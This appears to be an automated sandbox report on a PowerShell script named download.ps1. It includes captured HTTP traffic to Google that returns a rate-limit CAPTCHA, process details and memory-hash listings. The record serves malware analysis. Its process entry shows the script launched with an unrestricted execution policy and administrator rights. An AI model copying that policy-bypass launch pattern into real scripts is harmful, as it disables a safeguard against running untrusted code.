                                                  Data Ascii: ml;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://www.google.com/&amp;q=EgRmgZnuGJPJy7sGIjAGqlvERXPzShkPlNLjMFSvPtoc3E4y0-JVbcxkHnhkOaQ
                                                  Dec 30, 2024 19:21:07.504668951 CET522OUTGET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGJPJy7sGIjAGqlvERXPzShkPlNLjMFSvPtoc3E4y0-JVbcxkHnhkOaQwihcwIYeXll0295X-gxgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                  Host: www.google.com
                                                  Cookie: NID=520=TgkzjJGMk0U9jKryB3VzYZaHGNbgU8MjeqgQIbEgInq8OROoPx_NYGVnnlRugPtpMciDo3Cb6-JTd2N7GpXDC6B0qnKZwIJOQD664y2uujOTQObld23nYXu7atksck_LCVWNwtflHkxPld4G86A0RRA9_OWveJfpamkyxIMspPrUIF2-3U7kApv6_6ZQXGG6DFsu
                                                  Dec 30, 2024 19:21:07.647308111 CET1289INHTTP/1.1 429 Too Many Requests
                                                  Date: Mon, 30 Dec 2024 18:21:07 GMT
                                                  Pragma: no-cache
                                                  Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Content-Type: text/html
                                                  Server: HTTP server (unknown)
                                                  Content-Length: 3076
                                                  X-XSS-Protection: 0
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://www.google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" dat
                                                  Dec 30, 2024 19:21:07.647432089 CET1289INData Raw: 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b
                                                  Data Ascii: a-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="3BgAlq8n51eAHmt7MAChTylD61KMAqIFL-yvKj66fw_LB2mqhfmEzxIAVZg0vAyZjO-1eEXJCVKpEx_8WmooHZRvlaLEJ1MvBv9DYqBx-i4qFbRHGTg9rBJ4aG5Ut0O22in5pBGNPG8Xvb7Kp3dVK03
                                                  Dec 30, 2024 19:21:07.647520065 CET778INData Raw: 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74
                                                  Data Ascii: ervice</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a s


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:13:21:01
                                                  Start date:30/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                  Imagebase:0x7ff718a40000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:13:21:01
                                                  Start date:30/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6f9080000
                                                  File size:875'008 bytes
                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Reset < >
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 06415292d5bbf6e917c6b0f957829166816917e3f79e633e2e73b0bc238b9a24
                                                    • Instruction ID: 8fc7857c284fa726fd22fe4e7627b6504f1dc1147dfb8a4065de87094ddad73d
                                                    • Opcode Fuzzy Hash: 06415292d5bbf6e917c6b0f957829166816917e3f79e633e2e73b0bc238b9a24
                                                    • Instruction Fuzzy Hash: B6F1C430A09A8E4FEBA8DF28CC557E937D2FF55354F14426EE84DC7291DB34A9418B82
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ec29091317dd4c8e2a4ca6954c382bc79c454ab4b1313cfb51d4a455a4b67fe
                                                    • Instruction ID: 231f19c63fddde6da5e00756cabd38014c48fa33d82d89db51dff3885da9e7af
                                                    • Opcode Fuzzy Hash: 7ec29091317dd4c8e2a4ca6954c382bc79c454ab4b1313cfb51d4a455a4b67fe
                                                    • Instruction Fuzzy Hash: D9E1F630A09A4E4FEBA8DF28C8567F977D2FF55350F04426EE84DC7291DE78A8418782
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38582639850.00007FFD398C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD398C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd398c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Uw_H
                                                    • API String ID: 0-3373127264
                                                    • Opcode ID: 5b385e385a572b6f40c19d3f158b144a25eb0d6b62a38243df8b970cdc03272d
                                                    • Instruction ID: 3d10c0c75a2d4a539699fecb59bbc49274239f6ff8aa2497bf097316d0adf9bd
                                                    • Opcode Fuzzy Hash: 5b385e385a572b6f40c19d3f158b144a25eb0d6b62a38243df8b970cdc03272d
                                                    • Instruction Fuzzy Hash: 6A023822B0DB890FE7A69B285875575BBD2EF96218B1800FBD18DC71E3D918EC06D743
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38582639850.00007FFD398C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD398C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd398c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: p!Rs
                                                    • API String ID: 0-846547975
                                                    • Opcode ID: 852cbe8ff55f85ba6d42873f721e7af14465aee37e829e596feadbe32464c15b
                                                    • Instruction ID: da062ec22d10e20b6e6908ae8d2b6be1e3195745349fd4c3a555ac8cf7e6147a
                                                    • Opcode Fuzzy Hash: 852cbe8ff55f85ba6d42873f721e7af14465aee37e829e596feadbe32464c15b
                                                    • Instruction Fuzzy Hash: 88C14722B0DBC50FE7969B7C58A5670BFE2EF96214B1901EBC089CB293D9199C47C742
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 168176c888c7a1919ed8ecc2348caf104d07c79b028a009e2fbd94427000edf0
                                                    • Instruction ID: 29a7e3a4d191e2eb60aad0b760cbbd85038d77c0c713a793cfb58da3a6c2cbc7
                                                    • Opcode Fuzzy Hash: 168176c888c7a1919ed8ecc2348caf104d07c79b028a009e2fbd94427000edf0
                                                    • Instruction Fuzzy Hash: 98D17230A09A5D8FDF95DF58C465EE97BE2FFA9314F14416AD00ED7286CB24E881CB81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 284e6563e44128d17beabbdf41bd16cfa89ca7d67a5c4aad0460fe8625c434bc
                                                    • Instruction ID: 3bcbe935fba0457f10c12ac088ebb2ab64b55f7a426d8c208200b282c27d3c5f
                                                    • Opcode Fuzzy Hash: 284e6563e44128d17beabbdf41bd16cfa89ca7d67a5c4aad0460fe8625c434bc
                                                    • Instruction Fuzzy Hash: 93B1E37060DA4D4FEBA8EF28D8557E93BD1FF55354F04426EE88DC7292CE34A8458B82
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38582639850.00007FFD398C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD398C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd398c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 362422e4c06380966a911e8a08eb7b11481d94d4de6d1b226b0c2d630565f4d9
                                                    • Instruction ID: c217a20202a87dbb4524f9baa61713bdafffe8c5a3715018c1f91c599850ff99
                                                    • Opcode Fuzzy Hash: 362422e4c06380966a911e8a08eb7b11481d94d4de6d1b226b0c2d630565f4d9
                                                    • Instruction Fuzzy Hash: 35411522B0DA898FE7B99F2854615B4B7D2EF85229B1801BBC55DC70D3E918EC028B42
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578364908.00007FFD394FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD394FD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd394fd000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ce7b13ac987b5562db515b8dca555ac742e8c66898a14583d73fb4b0ef582cc
                                                    • Instruction ID: d30eb9954d435c21163a23d5f29a34e8c408bedfa21342daf0feb89950a256dd
                                                    • Opcode Fuzzy Hash: 7ce7b13ac987b5562db515b8dca555ac742e8c66898a14583d73fb4b0ef582cc
                                                    • Instruction Fuzzy Hash: C041363180DBC44FD7569F28A8519523FF0EF53320B1605EFD089CB1A7D625A84AC793
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38582639850.00007FFD398C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD398C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd398c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30632637caeab41482860cc503dbc79cabefbd8fe978aaffd2fa9256417420e5
                                                    • Instruction ID: b87fb568fdeec09dafa8294d66345ec84bc39f2dac2c603c4674e305ca88014a
                                                    • Opcode Fuzzy Hash: 30632637caeab41482860cc503dbc79cabefbd8fe978aaffd2fa9256417420e5
                                                    • Instruction Fuzzy Hash: 60311422B1DA564FE7A4AB189471574B2C3EFC8718B5801BBC94CD71E2DD19EC02AA83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1551229934a9cf86c9cf421d99fab9c9153d012c3cdaf069317896e89cc54e3
                                                    • Instruction ID: 77d7a10931b55a6e8c028800a9a0feb4eef2eadfd26cd0d0e3302f64bcc38c91
                                                    • Opcode Fuzzy Hash: d1551229934a9cf86c9cf421d99fab9c9153d012c3cdaf069317896e89cc54e3
                                                    • Instruction Fuzzy Hash: F731A17191CB4C8FDB18DB4C98466B97BE0FB99321F00422FE44993651DA71A8558BC2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 02295a5410f494e674e61501313cd5852a9fa1dddef1f14f7674236ae8da2f05
                                                    • Instruction ID: 5bbf30251122778f612ea564f2b76aaca03a2ff78f0d0f094b686a41e679c294
                                                    • Opcode Fuzzy Hash: 02295a5410f494e674e61501313cd5852a9fa1dddef1f14f7674236ae8da2f05
                                                    • Instruction Fuzzy Hash: 4221273090CA4C5FDB68DF6C884A6E67BE1EB96331F04426FD189C3192CA656457C792
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 82f54daf63d0cf5d5245a21139fef37509d956eb7d4c875bb6066b6486959cff
                                                    • Instruction ID: 987c9bbef61d6bb14339ab52c174eaada106026eba5954fe2e399f1e749e57f0
                                                    • Opcode Fuzzy Hash: 82f54daf63d0cf5d5245a21139fef37509d956eb7d4c875bb6066b6486959cff
                                                    • Instruction Fuzzy Hash: B6315C30A1A66ECEFBB49F14CC2ABF932E2FF01359F405139D54D86192CA382945DA12
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38582639850.00007FFD398C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD398C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd398c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6022facfe0fce05880f8a6b25d0ee5fb8db00bf88e8cf3c961894fda0d15ffe
                                                    • Instruction ID: f95992a00e6380a7defa94587cf129678afa310f48e47eaafec0eb92a744723a
                                                    • Opcode Fuzzy Hash: d6022facfe0fce05880f8a6b25d0ee5fb8db00bf88e8cf3c961894fda0d15ffe
                                                    • Instruction Fuzzy Hash: 93110622B1DB854FE750EF1C9896665B7E1EBA8314F04087FD48DC3292D925AC828B82
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38582639850.00007FFD398C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD398C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd398c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fcdd0d3403927302a68a6fc446fb7c10d4ad9bbce5cbcc4d5c7abc24533854b8
                                                    • Instruction ID: 76b4ea0918e7f0dff35b9cda01e8d2505f60b72b65c2c9810c068f671995b4e8
                                                    • Opcode Fuzzy Hash: fcdd0d3403927302a68a6fc446fb7c10d4ad9bbce5cbcc4d5c7abc24533854b8
                                                    • Instruction Fuzzy Hash: 9311E332B0D9458FE7B4EF1854605B4B7D2EF84229B1800FBC54DCB4E2D91CEC029B42
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e42f7be852997aad4d093363ab2f8fda0d552663f1d0235167e8d905805d9e74
                                                    • Instruction ID: d3069da42aec9d9927872e90a8396ae9358148443b41ddd41aca6383cb2e3cc4
                                                    • Opcode Fuzzy Hash: e42f7be852997aad4d093363ab2f8fda0d552663f1d0235167e8d905805d9e74
                                                    • Instruction Fuzzy Hash: E801677121CB0C4FD744EF0CE451AA9B7E0FB95324F50056EE58AC3665D636E892CB46
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bcf927363ce0b0aaaa5d834110a01cf5d399c8110048a68e92c5accf70a9a0bf
                                                    • Instruction ID: 91e9ffea767e5c7fb5f1ecc7337b956f83bbcbe55c76a7a01de706c33192fa54
                                                    • Opcode Fuzzy Hash: bcf927363ce0b0aaaa5d834110a01cf5d399c8110048a68e92c5accf70a9a0bf
                                                    • Instruction Fuzzy Hash: 30E0E575908A8C8F8B49EF1888594E97BA0FF69205B04069AE959C7121DB619958CBC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: UO_I$VO_I
                                                    • API String ID: 0-1081715140
                                                    • Opcode ID: f1a08c1edab32c8789ff9edac07e271c37a15b9674a07f3e94c73c80a8f8e20c
                                                    • Instruction ID: a2af42e4bd768030e8f3430fd1ca3161c5afc76c559c8a78e22bb3f4fc0813e4
                                                    • Opcode Fuzzy Hash: f1a08c1edab32c8789ff9edac07e271c37a15b9674a07f3e94c73c80a8f8e20c
                                                    • Instruction Fuzzy Hash: E9524D47B0F6D10BE3225E6D78651AD5B56EFE163571801FBE2888E0DB9808EC4FC2D6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 9
                                                    • API String ID: 0-2366072709
                                                    • Opcode ID: 17c1471f444e87a39c72af4fa0b2e09af9a1dcb4187b9072807fd5772fc11d95
                                                    • Instruction ID: dc4502807fe65f2f9ea3df24dc6fa7ac656abc12ae49a073b4be5d5ee03dcfad
                                                    • Opcode Fuzzy Hash: 17c1471f444e87a39c72af4fa0b2e09af9a1dcb4187b9072807fd5772fc11d95
                                                    • Instruction Fuzzy Hash: 4D02A162A4EBD24FE3139B7858750A57FB1EF5326470A40FBC5C4CB4A3E949680AD362
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: QO_^
                                                    • API String ID: 0-2562932814
                                                    • Opcode ID: 62b71694d434ad232fe437813f7cecfd6816c8fdd86574b25c1bb3133a80ffc3
                                                    • Instruction ID: 4b7fbe1dd32791f910e9eff11695eae4c2a275aeb401a45bd4633c4ca5699992
                                                    • Opcode Fuzzy Hash: 62b71694d434ad232fe437813f7cecfd6816c8fdd86574b25c1bb3133a80ffc3
                                                    • Instruction Fuzzy Hash: FF61C257B0C52346E3217EBFB4A51E92755DFE273EBA44473D249CD0839D18248F82E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.38578890355.00007FFD39610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD39610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd39610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0c59e14dee5da0bb43ab627daed594a64efe34bb442d32570971fad79b9f90d7
                                                    • Instruction ID: dbd30373d7406d13df5e90b67b90c4940afe1a35e8b155bfb7f1b433fa711d66
                                                    • Opcode Fuzzy Hash: 0c59e14dee5da0bb43ab627daed594a64efe34bb442d32570971fad79b9f90d7
                                                    • Instruction Fuzzy Hash: D4025667A0F6E25FE7528F2C58760E97FA1EF6222871900F7C6C44E093EA1D2817D752